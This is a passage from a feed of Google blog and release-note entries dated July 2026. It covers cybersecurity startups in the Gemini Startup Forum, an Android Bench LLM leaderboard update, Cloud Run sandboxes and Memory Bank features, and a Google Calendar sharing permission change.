&lt;p&gt;&lt;a href="https://www.mokn.io/" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;MokN&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;(France)&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Combats credential theft through a proactive identity recovery platform. Its proprietary technology turns the tables on attackers by using ultra-realistic decoy access points to trick them into revealing the credentials they have stolen. This can help neutralize threats before the compromised credentials can be exploited.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;SOC automation and offensive security&lt;/span&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://www.cognna.com" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;COGNNA&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt; (Saudi Arabia)&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Operates an agentic security operations center (SOC) platform that analyzes security alerts and automates threat response workflows. The platform ingests telemetry from existing endpoint and security information and event management (SIEM) tools, using AI agents to investigate incidents and reduce alert noise.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://latentdefense.ai/" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Latent Defense&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt; (United States)&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Builds foundational world models for cybersecurity to represent complex system architectures as dense, multi-dimensional graphs. The platform uses these graph representations to identify exploitable attack paths and test them with automated red-teaming agents.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://mate.security" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Mate Security&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt; (Israel)&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Investigates security alerts at scale using an AI-native security operations platform. It integrates with existing SIEM and security orchestration, automation, and response (SOAR) tools to map asset relationships, automatically triage incoming alerts, and minimize false-positive rates.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://www.nordsnipe.com" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Nrdsnipe&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt; (Sweden)&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Builds an AI-driven security testing platform, Hedgehog, that automates internal network penetration testing. Deployed directly in customer networks, it uses planner and terminal agents to map assets and construct exposure-based knowledge graphs.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://riffsec.com/" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;RIFFSEC&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt; (Poland)&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Delivers an early-warning threat intelligence and attack surface management platform tailored for the central European market. It monitors the dark web, Telegram channels, and code repositories to identify leaks, exposed credentials, and phishing campaigns.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://tandemtrace.ai/" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;TandemTrace&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt; (Spain)&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Augments security operations teams with autonomous AI agents that analyze raw telemetry to investigate alerts and hunt threats. The platform connects directly to existing data lakes and SIEM APIs to build human-readable context around security incidents.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Security infrastructure and specialized services&lt;/span&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://www.netsec.it" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Netsec&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt; (France)&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Manages the entire IT and cybersecurity lifecycle for mid-sized organizations through an all-in-one platform delivered directly inside collaboration channels. It automates user onboarding, device management, and SaaS posture remediation from a single control plane.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://revelum.ai/" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Revelum&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt; (United States)&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Detects and dismantles deepfake-driven fraud and impersonation campaigns at scale. The platform uses vision models and classification engines to analyze social media advertisements, verify biometric identities, and automate domain takedowns.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://www.synqly.com" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Synqly&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt; (United States)&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Provides a unified connectivity platform and API management control plane that simplifies integrations between IT and cybersecurity tools. It normalizes data schemas and acts as a deterministic middleware layer to facilitate bidirectional data sharing.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;By collaborating with global specialists, these startups are well-positioned to build a safer, more resilient digital infrastructure. The Gemini Startup Forum is a benefit of the Google for Startups Gemini Kit, packed with APIs, tools, training and technical resources to help startups scale with AI. You can &lt;/span&gt;&lt;a href="https://startup.google.com/gemini/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;learn more about the kit here&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The threat landscape is always evolving. To meet this challenge, we will continue our commitment to Google for Startups. Over the past four years, we’ve supported more than 50 cybersecurity founders, including &lt;/span&gt;&lt;a href="https://authologic.com/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Authologic&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="http://www.bfore.ai" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;BforeAI&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://www.build38.com/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Build38&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="http://cerby.com" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Cerby&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://www.crowdsec.net/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Crowdsec&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, and &lt;/span&gt;&lt;a href="http://www.riskledger.com/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Risk Ledger&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This year's cohort reflects the industry's transition from perimeter defense to autonomous AI agent security — emphasizing enterprise governance and the safe deployment of self-governing AI. &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;Looking ahead, the integration of these technologies will help define the next generation of proactive digital defense. &lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/products/identity-security/meet-the-33-cybersecurity-startups-joining-the-gemini-startup-forum" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-07-08T13:30:00+00:00</published>
  </entry>
  <entry>
    <id>https://android-developers.googleblog.com/2026/07/android-bench-llm-measurement.html</id>
    <title>Evolving how LLMs are measured for Android: the next era of Android Bench</title>
    <updated>2026-07-08T13:00:00+00:00</updated>
    <content type="html">&lt;img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCAy4lIbOAOrygTMaHZB8q4NarDrLRsqALfsmer5urQX7G_MaRDTw51uMh77Ks2knIuWM-zaEel63Dk2IlCVGD9IxLFy0B68KxwxsvDZzVDaEWaM4Bg8xJYinunaXS_fonxBw7-R4_qSplI4MJU7RDDaYlbq7nRXZoht5lFZVC7ErLEWHdWA6B2KgJvrk/s2469/Bench%20July%20releas%20V01_Meta.png" style="display: none;" /&gt;
&lt;div&gt;&lt;i&gt;Posted by Zoe Lopez-Latorre, Senior Developer Relations Engineer, Android&lt;/i&gt;&lt;/div&gt;&lt;div&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi49z_u9zPMjp-zyQ1yIpzLgDumtzUwZoprtIgPXv_kpF05e87KklDEguaKSJVhvV8dZJ7aVr98p-MG3FR4Sk37rcYTS91J3ADUQot-c-xnOuyIZ411VO4Hp43Yp7V_TwF6zO6RmAJpw51ZHPGbHfOwZxWgQ62SQeXblULcSc0RjMcZbLHGUZGgHzU6pEo/s8583/Bench%20July%20releas%20V01_Blog.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi49z_u9zPMjp-zyQ1yIpzLgDumtzUwZoprtIgPXv_kpF05e87KklDEguaKSJVhvV8dZJ7aVr98p-MG3FR4Sk37rcYTS91J3ADUQot-c-xnOuyIZ411VO4Hp43Yp7V_TwF6zO6RmAJpw51ZHPGbHfOwZxWgQ62SQeXblULcSc0RjMcZbLHGUZGgHzU6pEo/s1600/Bench%20July%20releas%20V01_Blog.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;p&gt;Back in March, we introduced &lt;a href="http://d.android.com/bench"&gt;Android Bench&lt;/a&gt;—our LLM leaderboard for real-world Android development tasks. Our goal was to provide transparency around model capabilities in Android development and to encourage model improvements, to give you more helpful AI options for your everyday workflow. Since then, we have enhanced the benchmark based on your feedback, including evaluating &lt;a href="https://x.com/AndroidDev/status/2064482677500080549"&gt;open-weight models&lt;/a&gt; and adding cost and efficiency dimensions to the leaderboard.&lt;/p&gt;

&lt;p&gt;But AI capabilities are ever-evolving, and measurement needs to follow suit. As part of our July release, we have adopted the &lt;a href="https://www.harborframework.com/"&gt;Harbor framework&lt;/a&gt;, which includes an updated version of the benchmarking agent used to evaluate models.&lt;/p&gt;

Along with this change to our evaluation, in this July release we’re adding 8 new models (&lt;b&gt;Claude Fable 5, Claude Sonnet 5, Claude Opus 4.8, GLM 5.2, Kimi K2.7 Code, MiniMax M3, Qwen 3.7 Plus and Qwen 3.7 Max&lt;/b&gt;) to the leaderboard. We’re also sharing opportunities for you, the Android developer community, to contribute to the benchmark. 

&lt;h2 style="margin-top: 10px;"&gt;Upgrading our methodology with the Harbor framework&lt;/h2&gt;

&lt;p&gt;When we designed Android Bench, we anchored our methodology on leading industry standards available at the time. We used mini-swe-agent v1, a general-purpose benchmarking agent, and adapted it to the nuances of Android development to provide a baseline measurement for the capabilities of models for common Android development tasks.&lt;/p&gt;

&lt;p&gt;To continue providing you with state-of-the-art evaluations that accurately measure the latest model capabilities on Android development, we are standardizing our benchmark to the &lt;a href="https://www.harborframework.com/"&gt;Harbor framework&lt;/a&gt;. Harbor defines standards and integrations that make it easy for anyone to run the benchmark, evaluate their preferred set-up, or share results – providing you with additional transparency and visibility.&lt;/p&gt;

&lt;p&gt;This upgrade enables us to more rigorously evaluate models and their capabilities, and we re-ran the benchmark on all models to establish an updated baseline. This means there is a minor shift in scoring, but you will still be able to view historical scores within &lt;a href="http://d.android.com/bench/archive"&gt;the archive&lt;/a&gt; on our website.&lt;/p&gt;

&lt;p&gt;We want to ensure Android Bench is helpful for you, so we will continuously update it as our evaluations and the industry mature.&lt;/p&gt;

&lt;h2 style="margin-top: 10px;"&gt;Expanding the leaderboard with 8 new models&lt;/h2&gt;

&lt;p&gt;As part of our commitment to keeping the leaderboard fresh, we have added Claude Fable 5, Claude Sonnet 5, Claude Opus 4.8, GLM 5.2, Kimi K2.7 Code, MiniMax M3, Qwen 3.7 Plus and Qwen 3.7 Max to the Android Bench leaderboard.&lt;/p&gt;

&lt;p&gt;You will see that &lt;b&gt;Claude Fable 5&lt;/b&gt; is at the top of the leaderboard with a score of 84.5, followed by &lt;b&gt;GPT 5.5&lt;/b&gt; with 80.2, with &lt;b&gt;Claude Sonnet 5&lt;/b&gt; in 3rd with a score of 76.2.&lt;/p&gt;

&lt;p&gt;When just comparing Open-weight models,&lt;b&gt; GLM 5.2&lt;/b&gt; is at the top with 72.2, followed by &lt;b&gt;Kimi K2.7 Code&lt;/b&gt; with a score of 70.4.&lt;/p&gt;

&lt;p&gt;You can check out model performance and efficiency metrics on the updated leaderboard to see how these new and previous models navigate Android-specific challenges like Jetpack Compose migrations, wearable networking, and platform API updates.&lt;/p&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQCbY3Td_I5gR8bC4uFSBTe4Sl-XuArNNdFU-27JP6-kwHycXt9AMpWfkLqjUIK37Zw18Tel6a7yOS9x0L_NabxBgYd9KIJKZ6dTLl6VxxJI4M7Zstqj12wvOFtF8LjnYrCIWnhCDdeGsgpQvFpFX8VOoSO0dFJcOW_gRc6eX7mXDq80sOwQAlQWNhlQg/s1999/image1.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQCbY3Td_I5gR8bC4uFSBTe4Sl-XuArNNdFU-27JP6-kwHycXt9AMpWfkLqjUIK37Zw18Tel6a7yOS9x0L_NabxBgYd9KIJKZ6dTLl6VxxJI4M7Zstqj12wvOFtF8LjnYrCIWnhCDdeGsgpQvFpFX8VOoSO0dFJcOW_gRc6eX7mXDq80sOwQAlQWNhlQg/s1600/image1.png" /&gt;&lt;/a&gt;&lt;/div&gt;

&lt;h2&gt;Opening Android Bench to community contributions&lt;/h2&gt;

&lt;p&gt;From the beginning, we’ve valued an open and transparent approach, which is why we made our original methodology and test harness publicly available on GitHub. You’ve asked for a way to provide feedback on our dataset, so now we’re taking collaboration a step further by giving you, the Android developer community, a chance to shape Android Bench.&lt;/p&gt;

&lt;p&gt;Starting today, you can contribute to Android Bench in two ways:&lt;/p&gt;

&lt;ul&gt;
    &lt;li&gt;Design and &lt;a href="https://github.com/android-bench/community-dataset"&gt;submit your own Android development tasks&lt;/a&gt; to evaluate how models handle the scenarios that matter to you.&lt;/li&gt;
    &lt;li&gt;&lt;a href="https://github.com/android-bench/community-results"&gt;Run and share benchmark evaluations&lt;/a&gt; firsthand, testing your preferred models against our dataset or your own custom tasks.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;We will be reviewing the submitted tasks and will be assessing if they get added to the benchmark. We hope to build a benchmark that truly reflects the diverse, day-to-day realities of the global Android developer community.&lt;/p&gt;

&lt;h2 style="margin-top: 10px;"&gt;Looking ahead&lt;/h2&gt;

&lt;p&gt;With more and more options for agentic development, maintaining a cutting-edge benchmark ensures that the AI assistance you rely on keeps getting smarter, more helpful, and more effective. Head over to our &lt;a href="https://github.com/android-bench/android-bench"&gt;GitHub repository&lt;/a&gt; to check out the tasks. We invite you to submit a task to our team for review, and you can check out &lt;a href="https://hub.harborframework.com/datasets/android-bench/android-bench/latest"&gt;Harbor Hub&lt;/a&gt; to explore the dataset or submit evaluations.&lt;/p&gt;

&lt;p&gt;As always, you can find the &lt;a href="http://d.android.com/bench"&gt;updated leaderboard&lt;/a&gt;, or read the &lt;a href="http://d.android.com/bench/methodology"&gt;methodology&lt;/a&gt; on our website.&lt;/p&gt;
  &lt;span style="display: none !important;"&gt;
    Android Bench, LLM leaderboard, Harbor framework, Android development, Claude Fable 5, GPT 5.5, Claude Sonnet 5, GLM 5.2, Kimi K2.7 Code, MiniMax M3, Qwen 3.7 Plus, Qwen 3.7 Max, AI benchmarking, Jetpack Compose migration, wearable networking, mobile AI agent, Zoe Lopez-Latorre, model evaluation, open-weight models, developer community contributions.
&lt;/span&gt;
  &lt;/div&gt;&lt;/div&gt;</content>
    <link href="https://android-developers.googleblog.com/2026/07/android-bench-llm-measurement.html" rel="alternate"/>
    <category term="Android Developers"/>
    <published>2026-07-08T13:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/company-news/outreach-and-initiatives/sustainability/thryve-earth-agroforestry</id>
    <title>We’re boosting agroforestry efforts to help the atmosphere and farmer livelihoods.</title>
    <updated>2026-07-08T13:00:00+00:00</updated>
    <content type="html">&lt;img src="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/Thryve_Symbiosis_herosocial.max-600x600.format-webp.webp" /&gt;Google is announcing a long-term agreement with Thryve.Earth for 260,000 tons of carbon removal.</content>
    <link href="https://blog.google/company-news/outreach-and-initiatives/sustainability/thryve-earth-agroforestry" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-07-08T13:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/products-and-platforms/products/maps/street-view-albania-montenegro-north-macedonia-serbia</id>
    <title>A fresh look at Albania, Montenegro, North Macedonia and Serbia on Street View</title>
    <updated>2026-07-08T08:00:00+00:00</updated>
    <content type="html">Street View imagery of Blue Eye (Albania), Kotor Town Walls (Montenegro), Skopje Fortress (North Macedonia), and Belgrade Fortress (Serbia)</content>
    <link href="https://blog.google/products-and-platforms/products/maps/street-view-albania-montenegro-north-macedonia-serbia" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-07-08T08:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://docs.cloud.google.com/release-notes#July_08_2026</id>
    <title>Cloud Release Notes — July 08, 2026</title>
    <updated>2026-07-08T07:00:00+00:00</updated>
    <content type="html">&lt;h2 class="release-note-product-title"&gt;Cloud Run&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;Cloud Run sandboxes provide a fast and secure isolated environment to execute untrusted code, such as code generated by AI agents. For more information, see &lt;a href="https://docs.cloud.google.com/run/docs/configuring/services/sandboxes"&gt;Configure sandboxes for services&lt;/a&gt; and &lt;a href="https://docs.cloud.google.com/run/docs/code-execution"&gt;Code execution in Cloud Run&lt;/a&gt; (&lt;a href="https://cloud.google.com/products#product-launch-stages"&gt;Preview&lt;/a&gt;).&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Gemini Enterprise Agent Platform&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Memory Bank support for Gemini Embedding 2&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Memory Bank supports the &lt;code&gt;gemini-embedding-2&lt;/code&gt; model for similarity search configurations.&lt;/p&gt;
&lt;p&gt;When you configure &lt;code&gt;gemini-embedding-2&lt;/code&gt; as the embedding model, you must use one of the &lt;code&gt;global&lt;/code&gt;, &lt;code&gt;us&lt;/code&gt;, or &lt;code&gt;eu&lt;/code&gt; endpoints in the model's resource name (for example, &lt;code&gt;projects/{project}/locations/us/publishers/google/models/gemini-embedding-2&lt;/code&gt;). Memory Bank does not support using regional locations (for example, &lt;code&gt;us-central1&lt;/code&gt;) for &lt;code&gt;gemini-embedding-2&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;For details, see &lt;a href="https://docs.cloud.google.com/gemini-enterprise-agent-platform/scale/memory-bank/setup#similarity-search-config"&gt;Similarity search configuration&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Memory Bank IngestEvents is generally available (GA)&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;The Memory Bank &lt;code&gt;IngestEvents&lt;/code&gt; API is generally available. The &lt;code&gt;IngestEvents&lt;/code&gt; API decouples event ingestion from memory generation, letting you continuously stream content to Memory Bank and configure when memory generation is triggered.&lt;/p&gt;
&lt;p&gt;This GA release includes the following features:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Carry over context between generation windows:&lt;/strong&gt; Use the &lt;code&gt;overlap_event_count&lt;/code&gt; parameter to re-include already-processed events at the start of the next window to keep memories coherent.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Configure memory revisions for ingested events:&lt;/strong&gt; Use &lt;code&gt;revision_labels&lt;/code&gt;, &lt;code&gt;revision_ttl&lt;/code&gt;, or &lt;code&gt;disable_memory_revisions&lt;/code&gt; to customize how generated revisions are managed.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Attach metadata to memories:&lt;/strong&gt; Use the &lt;code&gt;metadata&lt;/code&gt; and &lt;code&gt;metadata_merge_strategy&lt;/code&gt; configuration parameters to store structured information alongside generated memories.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;For details, see &lt;a href="https://docs.cloud.google.com/gemini-enterprise-agent-platform/scale/memory-bank/ingest-events"&gt;Ingest events&lt;/a&gt;.&lt;/p&gt;</content>
    <link href="https://docs.cloud.google.com/release-notes#July_08_2026" rel="alternate"/>
    <category term="Cloud Release Notes"/>
    <published>2026-07-08T07:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://geminicli.com/docs/changelogs/#announcements-v0500---2026-07-08</id>
    <title>Gemini CLI v0.50.0</title>
    <updated>2026-07-08T00:00:00+00:00</updated>
    <link href="https://geminicli.com/docs/changelogs/#announcements-v0500---2026-07-08" rel="alternate"/>
    <category term="Gemini CLI"/>
    <published>2026-07-08T00:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://workspaceupdates.googleblog.com/2026/07/new-calendar-sharing-permission-level-and-changes-to-recurring-event-visibility.html</id>
    <title>New calendar sharing permission level and changes to recurring event visibility</title>
    <updated>2026-07-07T18:08:42+00:00</updated>
    <content type="html">&lt;p&gt;We're introducing a new &lt;a href="https://support.google.com/calendar/answer/37082?hl=en&amp;amp;co=GENIE.Platform%3DDesktop&amp;amp;oco=0" target="_blank"&gt;calendar sharing permission level&lt;/a&gt;: “Make changes (see private events as free/busy)”. This allows you to grant someone edit access to your calendar while keeping the details of your private events entirely hidden. This is especially useful for leaders who assign delegates to help them manage their calendars.&lt;/p&gt;&lt;p&gt;Delegates assigned this restricted permission level will only be able to &lt;b&gt;create, delete, and edit non-private events.&lt;/b&gt; Private events will appear to delegates as “busy” blocks on the calendar grid, and delegates will not be able to edit or reschedule them. In addition, private events won’t show up in any search results for delegates.&lt;/p&gt;&lt;h4 style="text-align: left;"&gt;Changes to visibility for recurring events&lt;/h4&gt;&lt;p&gt;We’re also introducing changes to the way visibility settings are applied to recurring events.&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Users can no longer make changes to the visibility of a single event in a recurring series. Any changes to visibility will be applied to all events in the series.&lt;/li&gt;&lt;li&gt;Existing events in a recurring series will be updated to match the strictest visibility setting of any event in that series. In other words, if one event in the series is marked private but the others are not, all events in that series will be changed to private.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Getting started&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Admins:&lt;/b&gt; There is no admin control for this feature.&lt;/li&gt;&lt;li&gt;&lt;b&gt;End users: &lt;/b&gt;Users can grant delegates this new permission level in their Calendar settings. Visit the Help Center to &lt;a href="https://support.google.com/calendar/answer/37082?hl=en&amp;amp;co=GENIE.Platform%3DDesktop&amp;amp;oco=0" target="_blank"&gt;learn more about sharing your calendar.&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyFxU1O5_Uxh0G-LNuLOclNiEycMow-1tELYirJ47YafvqaIhXkxpuxyT3qYi8iJVPXNrPFOZRtsbzsouguUU_4czc-LVZd0FVfyjqxuzum1XCq7RyB5d7lzCuYLRorMaEIGJ7l72l2LdvE3TFtFcJsvO8w1zv-MkCJEML_Ql71XJuMPGd62wt8UN0sXU/s2048/New%20calendar%20sharing%20permission%20level%20and%20changes%20to%20recurring%20event%20visibility%20-%206966.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyFxU1O5_Uxh0G-LNuLOclNiEycMow-1tELYirJ47YafvqaIhXkxpuxyT3qYi8iJVPXNrPFOZRtsbzsouguUU_4czc-LVZd0FVfyjqxuzum1XCq7RyB5d7lzCuYLRorMaEIGJ7l72l2LdvE3TFtFcJsvO8w1zv-MkCJEML_Ql71XJuMPGd62wt8UN0sXU/s1600/New%20calendar%20sharing%20permission%20level%20and%20changes%20to%20recurring%20event%20visibility%20-%206966.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;p&gt;&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Rollout pace&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Rapid and Scheduled Release domains:&lt;/a&gt; Extended rollout (potentially longer than 15 days for feature visibility) starting on July 7, 2026&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Availability&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Available to all Google Workspace customers, Workspace Individual subscribers, and users with personal Google accounts&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Resources&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Google Calendar Help: &lt;a href="https://support.google.com/calendar/answer/37082?hl=en&amp;amp;co=GENIE.Platform%3DDesktop&amp;amp;oco=0" target="_blank"&gt;Share your calendar&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;</content>
    <link href="https://workspaceupdates.googleblog.com/2026/07/new-calendar-sharing-permission-level-and-changes-to-recurring-event-visibility.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-07-07T18:08:42+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/innovation-and-ai/technology/research/technology-global-crisis-resilience</id>
    <title>How governments and organizations are leveraging Google’s AI breakthroughs for crisis resilience</title>
    <updated>2026-07-07T17:50:00+00:00</updated>
    <content type="html">GiveDirectly Staff talking to a crowd of people</content>
    <link href="https://blog.google/innovation-and-ai/technology/research/technology-global-crisis-resilience" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-07-07T17:50:00+00:00</published>
  </entry>
  <entry>
    <id>https://research.google/blog/the-power-of-collaboration-how-we-can-reduce-traffic-congestion</id>
    <title>The power of collaboration: How we can reduce traffic congestion</title>
    <updated>2026-07-07T16:42:08+00:00</updated>
    <content type="html">Algorithms &amp; Theory</content>
    <link href="https://research.google/blog/the-power-of-collaboration-how-we-can-reduce-traffic-congestion" rel="alternate"/>
    <category term="Google Research"/>
    <published>2026-07-07T16:42:08+00:00</published>
  </entry>
  <entry>
    <id>https://workspaceupdates.googleblog.com/2026/07/fill-with-gemini-in-sheets-now-available-in-11-additional-languages.html</id>
    <title>Fill with Gemini in Sheets now available in 11 additional languages</title>
    <updated>2026-07-07T16:25:56+00:00</updated>
